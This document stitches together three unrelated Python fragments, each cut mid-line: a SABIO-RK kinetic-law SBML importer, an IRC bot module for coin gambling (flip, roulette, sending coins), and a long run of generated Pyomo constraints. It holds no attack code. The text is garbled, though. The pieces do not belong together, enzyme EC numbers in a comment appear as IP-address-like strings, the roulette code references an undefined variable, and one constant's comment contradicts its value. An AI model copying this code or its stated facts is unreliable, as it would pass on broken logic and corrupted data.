name = None
is_wildtype = True
variant = None
return (name, is_wildtype, variant)
raise ValueError('Cannot parse enzyme name: {}'.format(sbml))
def create_kinetic_law_from_sbml(self, id, sbml, specie_properties, functions, units):
""" Add a kinetic law to the local sqlite database
Args:
id (:obj:`int`): identifier
sbml (:obj:`libsbml.KineticLaw`): SBML-representation of a reaction
specie_properties (:obj:`dict`): additional properties of the compounds/enzymes
* `is_wildtype` (:obj:`bool`): indicates if the enzyme is wildtype or mutant
* `variant` (:obj:`str`): description of the variant of the eznyme
* `modifier_type` (:obj:`str`): type of the enzyme (e.g. Modifier-Catalyst)
functions (:obj:`dict` of :obj:`str`: :obj:`str`): dictionary of rate law equations (keys = IDs in SBML, values = equations)
units (:obj:`dict` of :obj:`str`: :obj:`str`): dictionary of units (keys = IDs in SBML, values = names)
Returns:
:obj:`KineticLaw`: kinetic law
Raises:
:obj:`ValueError`: if the temperature is expressed in an unsupported unit
"""
law = sbml.getKineticLaw()
x_refs = self.create_cross_references_from_sbml(law)
reaction_x_refs = self.create_cross_references_from_sbml(sbml)
# stop if kinetic law entry is empty
if not law.getMetaId():
return None
# ID
annotated_id = next((int(float(x_ref.id)) for x_ref in x_refs if x_ref.namespace == 'sabiork.kineticrecord'), None)
if annotated_id is not None and annotated_id != id:
raise ValueError('Annotated ID {} is different from expected ID {}'.format(annotated_id, id))
query = self.session.query(KineticLaw).filter_by(id=id)
if query.count():
kinetic_law = query.first()
else:
kinetic_law = KineticLaw(id=id)
self.session.add(kinetic_law)
""" participants """
kinetic_law.reactants[:] = []
reactants = sbml.getListOfReactants()
for i_part in range(reactants.size()):
part_sbml = reactants.get(i_part)
compound, compartment = self.get_specie_reference_from_sbml(part_sbml.getSpecies())
part = ReactionParticipant(
compound=compound,
compartment=compartment,
coefficient=part_sbml.getStoichiometry())
self.session.add(part)
kinetic_law.reactants.append(part)
kinetic_law.products[:] = []
products = sbml.getListOfProducts()
for i_part in range(products.size()):
part_sbml = products.get(i_part)
compound, compartment = self.get_specie_reference_from_sbml(part_sbml.getSpecies())
part = ReactionParticipant(
compound=compound,
compartment=compartment,
coefficient=part_sbml.getStoichiometry())
self.session.add(part)
kinetic_law.products.append(part)
""" cross references """
# Note: these are stored KineticLaws rather than under Reactions because this seems to how SABIO-RK stores this information.
# For example, kinetic laws 16016 and 28003 are associated with reaction 9930, but they have different EC numbers 172.16.31.10 and
# 172.16.58.3, respectively.
kinetic_law.cross_references = list(filter(lambda x_ref: x_ref.namespace not in ['taxonomy'], reaction_x_refs))
# rate_law
kinetic_law.equation = functions[law.getMetaId()[5:]]
# parameters
kinetic_law.parameters = []
params = law.getListOfLocalParameters()
for i_param in range(params.size()):
param = params.get(i_param)
match = re.match(r'^(.*?)_((SPC|ENZ)_([0-9]+)_(.*?))$', param.getId(), re.IGNORECASE)
if match:
observed_name = match.group(1)
species, compartment = self.get_specie_reference_from_sbml(match.group(2))
if isinstance(species, Compound):
compound = species
enzyme = None
else:
compound = None
enzyme = species
else:
observed_name = param.getId()
compound = None
enzyme = None
compartment = None
observed_name = observed_name.replace('div', '/')
observed_type = param.getSBOTerm()
observed_units_id = param.getUnits()
if observed_units_id:
if observed_units_id in units:
observed_units = units[observed_units_id]
else:
observed_units = observed_units_id
else:
observed_units = None
observed_value = param.getValue()
parameter = Parameter(
compound=compound,
enzyme=enzyme,
compartment=compartment,
observed_name=observed_name,
observed_type=observed_type,
observed_value=observed_value,
observed_units=observed_units,
modified=datetime.datetime.utcnow(),
)
self.session.add(parameter)
kinetic_law.parameters.append(parameter)
# modifiers to kinetic law
kinetic_law.modifiers[:] = []
modifiers = sbml.getListOfModifiers()
for i_modifier in range(modifiers.size()):
modifier = modifiers.get(i_modifier)
modifier_id = modifier.getSpecies()
specie, compartment = self.get_specie_reference_from_sbml(modifier_id)
type = specie_properties[modifier.getSpecies()]['modifier_type']
if modifier.getSpecies()[0:3] == 'SPC':
part = ReactionParticipant(
compound=specie,
compartment=compartment,
type=type,
)
self.session.add(part)
kinetic_law.modifiers.append(part)
elif modifier_id[0:3] == 'ENZ':
kinetic_law.enzyme, kinetic_law.enzyme_compartment = self.get_specie_reference_from_sbml(modifier_id)
kinetic_law.enzyme_type = specie_properties[modifier.getSpecies()]['modifier_type']
kinetic_law.taxon_wildtype = specie_properties[modifier_id]['is_wildtype']
kinetic_law.taxon_variant = specie_properties[modifier_id]['variant']
# taxon
kinetic_law.taxon = next((int(float(x_ref.id)) for x_ref in reaction_x_refs if x_ref.namespace == 'taxonomy'), None)
""" conditions """
conditions = law \
.getAnnotation() \
.getChild('sabiork') \
.getChild('experimentalConditions')
# temperature
if conditions.hasChild('temperature'):
temperature = conditions \
.getChild('temperature') \
.getChild('startValueTemperature') \
.getChild(0) \
.getCharacters()
temperature = float(temperature)
temperature_units = conditions \
.getChild('temperature') \
.getChild('temperatureUnit') \
.getChild(0) \
.getCharacters()
if temperature_units not in ['°C', '��C']:
raise ValueError('Unsupported temperature units: {}'.format(temperature_units))
kinetic_law.temperature = temperature
# pH
if conditions.hasChild('pH'):
ph = conditions \
.getChild('pH') \
.getChild('startValuepH') \
.getChild(0) \
.getCharacters()
kinetic_law.ph = float(ph)
# media
if conditions.hasChild('buffer'):
media = conditions \
.getChild('buffer') \
.getChild(0) \
.getCharacters() \
.strip()
kinetic_law.media = media
""" references """
kinetic_law.references = list(filter(lambda x_ref: x_ref.namespace != 'sabiork.kineticrecord', x_refs))
""" updated """
kinetic_law.modified = datetime.datetime.utcnow()
return kinetic_law
def normalize_kinetic_laws(self, ids):
""" Normalize parameter values
Args:
ids (:obj:`list` of :obj:`int`): list of IDs of kinetic laws to download
"""
for i_law, law in enumerate(self.session.query(KineticLaw).filter(KineticLaw.id.in_(ids)).all()):
if self.verbose and (i_law % 100 == 0):
print(' Normalizing kinetic law {} of {}'.format(i_law + 1, len(ids)))
if law.enzyme:
enzyme_molecular_weight = law.enzyme.molecular_weight
else:
enzyme_molecular_weight = None
for p in law.parameters:
p.name, p.type, p.value, p.error, p.units = self.normalize_parameter_value(
p.observed_name, p.observed_type, p.observed_value, p.observed_error, p.observed_units,
enzyme_molecular_weight)
if self.commit_intermediate_results:
self.session.commit()
def normalize_parameter_value(self, name, type, value, error, units, enzyme_molecular_weight):
"""
Args:
name (:obj:`str`): parameter name
type (:obj:`int`) parameter type (SBO term id)
value (:obj:`float`): observed value
error (:obj:`float`): observed error
units (:obj:`str`): observed units
enzyme_molecular_weight (:obj:`float`): enzyme molecular weight
Returns:
:obj:`tuple` of :obj:`str`, :obj:`int`, :obj:`float`, :obj:`float`, :obj:`str`: normalized name and
its type (SBO term), value, error, and units
Raises:
:obj:`ValueError`: if :obj:`units` is not a supported unit of :obj:`type`
"""
if type not in Parameter.TYPES:
return (None, None, None, None, None)
if value is None:
return (None, None, None, None, None)
type_name = Parameter.TYPES[type]
if type_name == 'k_cat':
if units in ['s^(-1)', 'mol*s^(-1)*mol^(-1)']:
return ('k_cat', 25, value, error, 's^(-1)')
if units in ['katal', 'katal_base']:
# cannot be converted without knowing the enzyme amount in the measurement
return (None, None, None, None, None)
if units in ['M^(-1)*s^(-1)']:
# off by mol^(2) * liter^(-1)
return (None, None, None, None, None)
if units in ['s^(-1)*g^(-1)', 'mol*s^(-1)*g^(-1)', 'M']:
return (None, None, None, None, None)
if units is None:
return (None, None, None, None, None)
elif type_name == 'k_m':
if units in ['M']:
return ('k_m', 27, value, error, 'M')
if units in ['mol']:
# off by liter^(-1)
return (None, None, None, None, None)
if units in ['mg/ml', 'M^2', 'mol/mol', 'katal*g^(-1)', 's^(-1)', 'mol*s^(-1)*g^(-1)',
'l*g^(-1)*s^(-1)', 'M^(-1)*s^(-1)', 'M^(-1)']:
return (None, None, None, None, None)
if units is None:
return (None, None, None, None, None)
elif type_name == 'v_max':
if units in ['mol*s^(-1)*g^(-1)', 'katal*g^(-1)']:
if enzyme_molecular_weight:
f = enzyme_molecular_weight
return ('k_cat', 25, value * float(f) if value else None, error * | |
<reponame>dngfx/MagicBot<filename>modules/coins.py
# --depends-on commands
# --depends-on permissions
import datetime, decimal, functools, math, random, re, time
from src import ModuleManager, utils
SIDES = {"heads": 0, "tails": 1}
DEFAULT_REDEEM_DELAY = 150 # 300 seconds, 2.5 minutes
DEFAULT_REDEEM_AMOUNT = 10000
DECIMAL_ZERO = 0 # Just in case.
BET_MINIMUM = 1
HOUR_SECONDS = (1 * 60) * 60
LOTTERY_INTERVAL = (60 * 60) * 6 # 6 hours
LOTTERY_BUYIN = 100
RED = [1, 3, 5, 7, 9, 12, 14, 16, 18, 19, 21, 23, 25, 27, 30, 32, 34, 36]
BLACK = [2, 4, 6, 8, 10, 11, 13, 15, 17, 20, 22, 24, 26, 28, 29, 31, 33, 35]
SMALL = range(1, 19)
BIG = range(19, 37)
FIRST_DOZEN = list(range(1, 13))
SECOND_DOZEN = list(range(13, 25))
THIRD_DOZEN = list(range(25, 37))
FIRST_COLUMN = list(range(1, 37))[0::3]
SECOND_COLUMN = list(range(1, 37))[1::3]
THIRD_COLUMN = list(range(1, 37))[2::3]
REGEX_STREET = re.compile("street([1-9]|1[0-2])$")
REGEX_DOUBLESTREET = re.compile("2street([1-9]|1[0-1])$")
REGEX_CORNER = re.compile("([lr])corner([1-9]|1[0-1])$")
class CoinParseException(Exception):
pass
class Module(ModuleManager.BaseModule):
def _coin_spec_parse(self, word):
if isinstance(word, str) and word.isdigit():
return int(word)
if isinstance(word, int):
if word >= DECIMAL_ZERO:
return word
else:
raise utils.parse.SpecTypeError("Please provide a positive coin amount")
raise utils.parse.SpecTypeError("Please provide a valid coin amount")
@utils.export("command-spec.coins")
def _coins_spec(self, server, channel, user, args):
if args:
return self._coin_spec_parse(args[0]), 1
else:
raise utils.parse.SpecTypeError("No coin amount provided")
@utils.export("command-spec.coinsmany")
def _coins_many_spec(self, server, channel, user, args):
out = []
for arg in args:
out.append(self._coin_spec_parse(arg))
return (out or None), 1
def _until_next_hour(self, now=None):
now = now or datetime.datetime.utcnow()
until_next_hour = 60 - now.second
return until_next_hour + ((60 - (now.minute + 1)) * 60)
def _until_next_6_hour(self):
now = datetime.datetime.utcnow()
until_next_hour = self._until_next_hour(now)
until_next_6_hour = (6 - (now.hour % 6)) - 1
until_next_6_hour = until_next_6_hour * HOUR_SECONDS
return until_next_hour + until_next_6_hour
def _get_user_coins(self, user):
return user.get_setting("coins", 0)
def _set_user_coins(self, user, coins):
user.set_setting("coins", coins)
def _all_coins(self, server):
all_coins = server.get_all_user_settings("coins", [])
for i, (nickname, coins) in enumerate(all_coins):
all_coins[i] = (nickname, coins)
return dict(filter(lambda coin: coin[1], all_coins))
def _redeem_amount(self, server):
return int(server.get_setting("redeem-amount", DEFAULT_REDEEM_AMOUNT))
def _redeem_delay(self, server):
return server.get_setting("redeem-delay", DEFAULT_REDEEM_DELAY)
def _give(self, server, user, amount):
user_coins = int(self._get_user_coins(user))
new_amount = amount + user_coins
self._set_user_coins(user, new_amount)
return new_amount
def _take(self, server, user, amount):
user_coins = self._get_user_coins(user)
self._set_user_coins(user, user_coins - amount)
return user_coins - amount
def _move(self, user1, user2, amount):
user1_coins = self._get_user_coins(user1)
self._set_user_coins(user1, user1_coins - amount)
user2_coins = self._get_user_coins(user2)
self._set_user_coins(user2, user2_coins + amount)
def _coin_str(self, coins):
return utils.parse.comma_format(coins)
def _coin_str_human(self, coins):
return utils.parse.comma_format(coins)
@utils.hook("received.command.coins")
@utils.kwarg("help", "Show how many coins you have")
def coins(self, event):
if event["args_split"]:
target = event["server"].get_user(event["args_split"][0])
else:
target = event["user"]
coins = self._get_user_coins(target)
event["stdout"].write(
"%s has %s coin%s"
% (target.nickname, self._coin_str_human(coins), "" if coins == 1 else "s")
)
@utils.hook("received.command.resetcoins")
@utils.kwarg("help", "Reset a user's coins to 0")
@utils.kwarg("permission", "reset-coins")
@utils.spec("!<nickname>ouser")
def reset_coins(self, event):
target = event["server"].get_user(event["args_split"][0])
self._set_user_coins(target, 0)
event["stdout"].write("Reset coins for %s" % target.nickname)
@utils.hook("received.command.givecoins")
@utils.kwarg("help", "Create coins and give them to a user")
@utils.kwarg("permission", "give-coins")
@utils.spec("!<nickname>ouser !<amount>coins")
def give_coins(self, event):
target = event["server"].get_user(event["args_split"][0])
coins = int(event["args_split"][1])
self._give(event["server"], target, coins)
event["stdout"].write(
"Gave '%s' %s coins" % (target.nickname, self._coin_str(coins))
)
@utils.hook("received.command.richest")
@utils.spec("!-channelonly")
@utils.kwarg("help", "Show the top 10 richest users")
def richest(self, event):
top_10 = utils.top_10(
self._all_coins(event["server"]),
convert_key=lambda nickname: event["server"].get_user(nickname).nickname,
value_format=lambda value: self._coin_str_human(value),
)
event["stdout"].write("Richest users: %s" % ", ".join(top_10))
def _redeem_cache(self, server, user):
return "redeem|%s|%s@%s" % (server.id, user.username, user.hostname)
@utils.hook("received.command.redeemcoins")
@utils.kwarg("help", "Redeem your free coins")
def redeem_coins(self, event):
user_coins = self._get_user_coins(event["user"])
if user_coins == 0:
cache = self._redeem_cache(event["server"], event["user"])
if not self.bot.cache.has_item(cache):
redeem_amount = self._redeem_amount(event["server"])
self._give(event["server"], event["user"], redeem_amount)
event["stdout"].write(
"%s: redeemed %s coins"
% (event["user"].nickname, self._coin_str(redeem_amount))
)
redeem_delay = self._redeem_delay(event["server"])
self.bot.cache.temporary_cache(cache, True, redeem_delay)
else:
time_left = self.bot.cache.until_expiration(cache)
event["stderr"].write(
"%s: Please wait %s before redeeming"
% (
event["user"].nickname,
utils.datetime.format.to_pretty_until(time_left),
)
)
else:
event["stderr"].write(
"%s: You can only redeem coins when you have none"
% event["user"].nickname
)
@utils.hook("received.command.flip")
@utils.kwarg("help", "Bet on a coin flip")
@utils.kwarg("authenticated", True)
@utils.spec("!'heads,tails !'all")
@utils.spec("!'heads,tails !<amount>coins")
def flip(self, event):
side_name = event["spec"][0]
coin_bet = event["spec"][1]
if isinstance(coin_bet, str) and coin_bet != "all":
return
user_coins = self._get_user_coins(event["user"])
if coin_bet == "all":
coin_bet = self._get_user_coins(event["user"])
if coin_bet <= 0:
raise utils.EventError(
"%s: You have no coins to bet" % event["user"].nickname
)
if coin_bet < 0:
raise utils.EventError(
"%s: You cant bet less than 0 coins", event["user"].nickname
)
if coin_bet > user_coins:
raise utils.EventError(
"%s: You don't have enough coins to bet" % event["user"].nickname
)
chosen_side = random.SystemRandom().choice(list(SIDES.keys()))
win = side_name == chosen_side
coin_bet_str = self._coin_str_human(coin_bet)
if win:
new_total = self._give(event["server"], event["user"], coin_bet)
event["stdout"].write(
"%s flips %s and wins %s coin%s! (new total: %s)"
% (
event["user"].nickname,
side_name,
coin_bet_str,
"" if coin_bet == 1 else "s",
self._coin_str_human(new_total),
)
)
else:
self._take(event["server"], event["user"], coin_bet)
event["stdout"].write(
"%s flips %s and loses %s coin%s! (new total: %s)"
% (
event["user"].nickname,
side_name,
coin_bet_str,
"" if coin_bet == 1 else "s",
self._coin_str_human(user_coins - coin_bet),
)
)
@utils.hook("received.command.sendcoins")
@utils.kwarg("help", "Send coins to another user")
@utils.kwarg("authenticated", True)
@utils.spec("!<nickname>ouser !<amount>coins")
def send(self, event):
target_user = event["spec"][0]
if event["user"].get_id() == target_user.get_id():
raise utils.EventError(
"%s: You can't send coins to yourself" % event["user"].nickname
)
send_amount = event["spec"][1]
user_coins = self._get_user_coins(event["user"])
redeem_amount = self._redeem_amount(event["server"])
new_total_coins = self._get_user_coins(event["user"]) - send_amount
if user_coins == 0:
raise utils.EventError("%s: You have no coins" % event["user"].nickname)
elif new_total_coins < redeem_amount:
raise utils.EventError(
"%s: You cannot send an amount of money that puts"
" you below %s coins"
% (event["user"].nickname, self._coin_str(redeem_amount))
)
target_user_coins = self._get_user_coins(target_user)
self._move(event["user"], target_user, send_amount)
event["stdout"].write(
"%s sent %s coins to %s"
% (
event["user"].nickname,
self._coin_str(send_amount),
target_user.nickname,
)
)
def _double_street(self, i):
return (i * 3) - 2, (i * 3) + 3
@utils.hook("received.command.roulette")
@utils.kwarg("help", "Spin a roulette wheel")
@utils.kwarg("authenticated", True)
@utils.spec("!<types>word !'all")
@utils.spec("!<types>word !<amounts>coinsmany")
def roulette(self, event):
bets = event["spec"][0].lower().split(",")
if not len(bets) <= len(event["spec"][1]):
raise utils.EventError(
"%s: Please provide an amount for each bet" % event["user"].nickname
)
if "0" == bets:
raise utils.EventError("%s: You can't bet on 0" % event["user"].nickname)
bet_amounts = []
if event["spec"][1] == "all":
all_coins = self._get_user_coins(event["user"])
if all_coins <= 0:
all_coins = self._set_user_coins(event["user"], 0)
raise utils.EventError(
"%s: You have no coins to bet" % event["user"].nickname
)
bet_amounts = [all_coins]
else:
bet_amounts = event["spec"][1]
bet_amount_total = sum(all_coins)
user_coins = self._get_user_coins(event["user"])
if bet_amount_total > user_coins:
raise utils.EventError(
"%s: You don't have enough coins to bet" % event["user"].nickname
)
# black, red, odds, evens, low (1-18), high (19-36)
# 1dozen (1-12), 2dozen (13-24), 3dozen (25-36)
# 1column (1,4..34), 2column (2,5..35), 3column (3,6..36)
choice = random.SystemRandom().randint(0, 36)
winnings = {}
losses = {}
if choice == 0:
event["stdout"].write(
"Roulette spin lands on 0, "
"the house wins, %s loses %s"
% (event["user"].nickname, self._coin_str_human(bet_amount_total))
)
self._take(event["server"], event["user"], bet_amount_total)
return
colour = "red" if choice in RED else "black"
for i, bet in enumerate(bets):
street_match = REGEX_STREET.match(bet)
doublestreet_match = REGEX_DOUBLESTREET.match(bet)
corner_match = REGEX_CORNER.match(bet)
odds = 0
if bet == "even":
odds = 1 * ((choice % 2) == 0)
elif bet == "odd":
odds = 1 * ((choice % 2) == 1)
elif bet == "red":
odds = 1 * (choice in RED)
elif bet == "black":
odds = 1 * (choice in BLACK)
elif bet == "small" or bet == "low":
odds = 1 * (choice in SMALL)
elif bet == "big" or bet == "high":
odds = 1 * (choice in BIG)
elif bet == "dozen1":
odds = 2 * (choice in FIRST_DOZEN)
elif bet == "dozen2":
odds = 2 * (choice in SECOND_DOZEN)
elif bet == "dozen3":
odds = 2 * (choice in THIRD_DOZEN)
elif bet == "column1":
odds = 2 * (choice in FIRST_COLUMN)
elif bet == "column2":
odds = 2 * (choice in SECOND_COLUMN)
elif bet == "column3":
odds = 2 * (choice in THIRD_COLUMN)
elif street_match:
row = int(street_match.group(1))
odds = 11 * (((row * 3) - 2) <= choice <= (row * 3))
elif doublestreet_match:
row = int(doublestreet_match.group(1))
min_num, max_num = self._double_street(row)
odds = 5 * (min_num <= choice <= max_num)
elif corner_match:
row = int(corner_match.group(2))
min_num, max_num = self._double_street(row)
numbers = list(range(min_num, max_num + 1))
if corner_match.group(1) == "l":
numbers = numbers[:2] + numbers[3:5]
else:
numbers = numbers[1:3] + numbers[-2:]
odds = 8 * (choice in numbers)
elif bet.isdigit() and (1 <= int(bet) <= 36):
odds = 35 * (choice == int(bet))
else:
| |
Constraint(expr= m.x6661 - 320*m.b7092 <= 0)
m.c5129 = Constraint(expr= m.x6662 - 320*m.b7093 <= 0)
m.c5130 = Constraint(expr= m.x6663 - 320*m.b7091 <= 0)
m.c5131 = Constraint(expr= m.x6664 - 320*m.b7092 <= 0)
m.c5132 = Constraint(expr= m.x6665 - 320*m.b7093 <= 0)
m.c5133 = Constraint(expr= m.x6634 - 330*m.b7070 <= 0)
m.c5134 = Constraint(expr= m.x6635 - 330*m.b7074 <= 0)
m.c5135 = Constraint(expr= m.x6636 - 330*m.b7073 <= 0)
m.c5136 = Constraint(expr= m.x6637 - 330*m.b7074 <= 0)
m.c5137 = Constraint(expr= m.x6638 - 330*m.b7078 <= 0)
m.c5138 = Constraint(expr= m.x6639 - 330*m.b7077 <= 0)
m.c5139 = Constraint(expr= m.x6640 - 330*m.b7078 <= 0)
m.c5140 = Constraint(expr= m.x6641 - 330*m.b7076 <= 0)
m.c5141 = Constraint(expr= m.x6642 - 330*m.b7077 <= 0)
m.c5142 = Constraint(expr= m.x6643 - 330*m.b7078 <= 0)
m.c5143 = Constraint(expr= m.x6644 - 330*m.b7081 <= 0)
m.c5144 = Constraint(expr= m.x6645 - 330*m.b7080 <= 0)
m.c5145 = Constraint(expr= m.x6646 - 330*m.b7081 <= 0)
m.c5146 = Constraint(expr= m.x6647 - 330*m.b7079 <= 0)
m.c5147 = Constraint(expr= m.x6648 - 330*m.b7080 <= 0)
m.c5148 = Constraint(expr= m.x6649 - 330*m.b7081 <= 0)
m.c5149 = Constraint(expr= m.x6650 - 340*m.b7082 <= 0)
m.c5150 = Constraint(expr= m.x6651 - 340*m.b7086 <= 0)
m.c5151 = Constraint(expr= m.x6652 - 340*m.b7085 <= 0)
m.c5152 = Constraint(expr= m.x6653 - 340*m.b7086 <= 0)
m.c5153 = Constraint(expr= m.x6654 - 340*m.b7090 <= 0)
m.c5154 = Constraint(expr= m.x6655 - 340*m.b7089 <= 0)
m.c5155 = Constraint(expr= m.x6656 - 340*m.b7090 <= 0)
m.c5156 = Constraint(expr= m.x6657 - 340*m.b7088 <= 0)
m.c5157 = Constraint(expr= m.x6658 - 340*m.b7089 <= 0)
m.c5158 = Constraint(expr= m.x6659 - 340*m.b7090 <= 0)
m.c5159 = Constraint(expr= m.x6660 - 340*m.b7093 <= 0)
m.c5160 = Constraint(expr= m.x6661 - 340*m.b7092 <= 0)
m.c5161 = Constraint(expr= m.x6662 - 340*m.b7093 <= 0)
m.c5162 = Constraint(expr= m.x6663 - 340*m.b7091 <= 0)
m.c5163 = Constraint(expr= m.x6664 - 340*m.b7092 <= 0)
m.c5164 = Constraint(expr= m.x6665 - 340*m.b7093 <= 0)
m.c5165 = Constraint(expr= m.x6650 - 355*m.b7082 <= 0)
m.c5166 = Constraint(expr= m.x6651 - 355*m.b7086 <= 0)
m.c5167 = Constraint(expr= m.x6652 - 355*m.b7085 <= 0)
m.c5168 = Constraint(expr= m.x6653 - 355*m.b7086 <= 0)
m.c5169 = Constraint(expr= m.x6654 - 355*m.b7090 <= 0)
m.c5170 = Constraint(expr= m.x6655 - 355*m.b7089 <= 0)
m.c5171 = Constraint(expr= m.x6656 - 355*m.b7090 <= 0)
m.c5172 = Constraint(expr= m.x6657 - 355*m.b7088 <= 0)
m.c5173 = Constraint(expr= m.x6658 - 355*m.b7089 <= 0)
m.c5174 = Constraint(expr= m.x6659 - 355*m.b7090 <= 0)
m.c5175 = Constraint(expr= m.x6660 - 355*m.b7093 <= 0)
m.c5176 = Constraint(expr= m.x6661 - 355*m.b7092 <= 0)
m.c5177 = Constraint(expr= m.x6662 - 355*m.b7093 <= 0)
m.c5178 = Constraint(expr= m.x6663 - 355*m.b7091 <= 0)
m.c5179 = Constraint(expr= m.x6664 - 355*m.b7092 <= 0)
m.c5180 = Constraint(expr= m.x6665 - 355*m.b7093 <= 0)
m.c5181 = Constraint(expr= m.x6650 - 360*m.b7082 <= 0)
m.c5182 = Constraint(expr= m.x6651 - 360*m.b7086 <= 0)
m.c5183 = Constraint(expr= m.x6652 - 360*m.b7085 <= 0)
m.c5184 = Constraint(expr= m.x6653 - 360*m.b7086 <= 0)
m.c5185 = Constraint(expr= m.x6654 - 360*m.b7090 <= 0)
m.c5186 = Constraint(expr= m.x6655 - 360*m.b7089 <= 0)
m.c5187 = Constraint(expr= m.x6656 - 360*m.b7090 <= 0)
m.c5188 = Constraint(expr= m.x6657 - 360*m.b7088 <= 0)
m.c5189 = Constraint(expr= m.x6658 - 360*m.b7089 <= 0)
m.c5190 = Constraint(expr= m.x6659 - 360*m.b7090 <= 0)
m.c5191 = Constraint(expr= m.x6660 - 360*m.b7093 <= 0)
m.c5192 = Constraint(expr= m.x6661 - 360*m.b7092 <= 0)
m.c5193 = Constraint(expr= m.x6662 - 360*m.b7093 <= 0)
m.c5194 = Constraint(expr= m.x6663 - 360*m.b7091 <= 0)
m.c5195 = Constraint(expr= m.x6664 - 360*m.b7092 <= 0)
m.c5196 = Constraint(expr= m.x6665 - 360*m.b7093 <= 0)
m.c5197 = Constraint(expr= m.x6666 - 360*m.b7094 <= 0)
m.c5198 = Constraint(expr= m.x6667 - 360*m.b7098 <= 0)
m.c5199 = Constraint(expr= m.x6668 - 360*m.b7097 <= 0)
m.c5200 = Constraint(expr= m.x6669 - 360*m.b7098 <= 0)
m.c5201 = Constraint(expr= m.x6670 - 360*m.b7102 <= 0)
m.c5202 = Constraint(expr= m.x6671 - 360*m.b7101 <= 0)
m.c5203 = Constraint(expr= m.x6672 - 360*m.b7102 <= 0)
m.c5204 = Constraint(expr= m.x6673 - 360*m.b7100 <= 0)
m.c5205 = Constraint(expr= m.x6674 - 360*m.b7101 <= 0)
m.c5206 = Constraint(expr= m.x6675 - 360*m.b7102 <= 0)
m.c5207 = Constraint(expr= m.x6676 - 360*m.b7105 <= 0)
m.c5208 = Constraint(expr= m.x6677 - 360*m.b7104 <= 0)
m.c5209 = Constraint(expr= m.x6678 - 360*m.b7105 <= 0)
m.c5210 = Constraint(expr= m.x6679 - 360*m.b7103 <= 0)
m.c5211 = Constraint(expr= m.x6680 - 360*m.b7104 <= 0)
m.c5212 = Constraint(expr= m.x6681 - 360*m.b7105 <= 0)
m.c5213 = Constraint(expr= m.x6730 - 360*m.b7142 <= 0)
m.c5214 = Constraint(expr= m.x6731 - 360*m.b7146 <= 0)
m.c5215 = Constraint(expr= m.x6732 - 360*m.b7145 <= 0)
m.c5216 = Constraint(expr= m.x6733 - 360*m.b7146 <= 0)
m.c5217 = Constraint(expr= m.x6734 - 360*m.b7150 <= 0)
m.c5218 = Constraint(expr= m.x6735 - 360*m.b7149 <= 0)
m.c5219 = Constraint(expr= m.x6736 - 360*m.b7150 <= 0)
m.c5220 = Constraint(expr= m.x6737 - 360*m.b7148 <= 0)
m.c5221 = Constraint(expr= m.x6738 - 360*m.b7149 <= 0)
m.c5222 = Constraint(expr= m.x6739 - 360*m.b7150 <= 0)
m.c5223 = Constraint(expr= m.x6740 - 360*m.b7153 <= 0)
m.c5224 = Constraint(expr= m.x6741 - 360*m.b7152 <= 0)
m.c5225 = Constraint(expr= m.x6742 - 360*m.b7153 <= 0)
m.c5226 = Constraint(expr= m.x6743 - 360*m.b7151 <= 0)
m.c5227 = Constraint(expr= m.x6744 - 360*m.b7152 <= 0)
m.c5228 = Constraint(expr= m.x6745 - 360*m.b7153 <= 0)
m.c5229 = Constraint(expr= m.x6730 - 365*m.b7142 <= 0)
m.c5230 = Constraint(expr= m.x6731 - 365*m.b7146 <= 0)
m.c5231 = Constraint(expr= m.x6732 - 365*m.b7145 <= 0)
m.c5232 = Constraint(expr= m.x6733 - 365*m.b7146 <= 0)
m.c5233 = Constraint(expr= m.x6734 - 365*m.b7150 <= 0)
m.c5234 = Constraint(expr= m.x6735 - 365*m.b7149 <= 0)
m.c5235 = Constraint(expr= m.x6736 - 365*m.b7150 <= 0)
m.c5236 = Constraint(expr= m.x6737 - 365*m.b7148 <= 0)
m.c5237 = Constraint(expr= m.x6738 - 365*m.b7149 <= 0)
m.c5238 = Constraint(expr= m.x6739 - 365*m.b7150 <= 0)
m.c5239 = Constraint(expr= m.x6740 - 365*m.b7153 <= 0)
m.c5240 = Constraint(expr= m.x6741 - 365*m.b7152 <= 0)
m.c5241 = Constraint(expr= m.x6742 - 365*m.b7153 <= 0)
m.c5242 = Constraint(expr= m.x6743 - 365*m.b7151 <= 0)
m.c5243 = Constraint(expr= m.x6744 - 365*m.b7152 <= 0)
m.c5244 = Constraint(expr= m.x6745 - 365*m.b7153 <= 0)
m.c5245 = Constraint(expr= m.x6634 - 370*m.b7070 <= 0)
m.c5246 = Constraint(expr= m.x6635 - 370*m.b7074 <= 0)
m.c5247 = Constraint(expr= m.x6636 - 370*m.b7073 <= 0)
m.c5248 = Constraint(expr= m.x6637 - 370*m.b7074 <= 0)
m.c5249 = Constraint(expr= m.x6638 - 370*m.b7078 <= 0)
m.c5250 = Constraint(expr= m.x6639 - 370*m.b7077 <= 0)
m.c5251 = Constraint(expr= m.x6640 - 370*m.b7078 <= 0)
m.c5252 = Constraint(expr= m.x6641 - 370*m.b7076 <= 0)
m.c5253 = Constraint(expr= m.x6642 - 370*m.b7077 <= 0)
m.c5254 = Constraint(expr= m.x6643 - 370*m.b7078 <= 0)
m.c5255 = Constraint(expr= m.x6644 - 370*m.b7081 <= 0)
m.c5256 = Constraint(expr= m.x6645 - 370*m.b7080 <= 0)
m.c5257 = Constraint(expr= m.x6646 - 370*m.b7081 <= 0)
m.c5258 = Constraint(expr= m.x6647 - 370*m.b7079 <= 0)
m.c5259 = Constraint(expr= m.x6648 - 370*m.b7080 <= 0)
m.c5260 = Constraint(expr= m.x6649 - 370*m.b7081 <= 0)
m.c5261 = Constraint(expr= m.x6666 - 380*m.b7094 <= 0)
m.c5262 = Constraint(expr= m.x6667 - 380*m.b7098 <= 0)
m.c5263 = Constraint(expr= m.x6668 - 380*m.b7097 <= 0)
m.c5264 = Constraint(expr= m.x6669 - 380*m.b7098 <= 0)
m.c5265 = Constraint(expr= m.x6670 - 380*m.b7102 <= 0)
m.c5266 = Constraint(expr= m.x6671 - 380*m.b7101 <= 0)
m.c5267 = Constraint(expr= m.x6672 - 380*m.b7102 <= 0)
m.c5268 = Constraint(expr= m.x6673 - 380*m.b7100 <= 0)
m.c5269 = Constraint(expr= m.x6674 - 380*m.b7101 <= 0)
m.c5270 = Constraint(expr= m.x6675 - 380*m.b7102 <= 0)
m.c5271 = Constraint(expr= m.x6676 - 380*m.b7105 <= 0)
m.c5272 = Constraint(expr= m.x6677 - 380*m.b7104 <= 0)
m.c5273 = Constraint(expr= m.x6678 - 380*m.b7105 <= 0)
m.c5274 = Constraint(expr= m.x6679 - 380*m.b7103 <= 0)
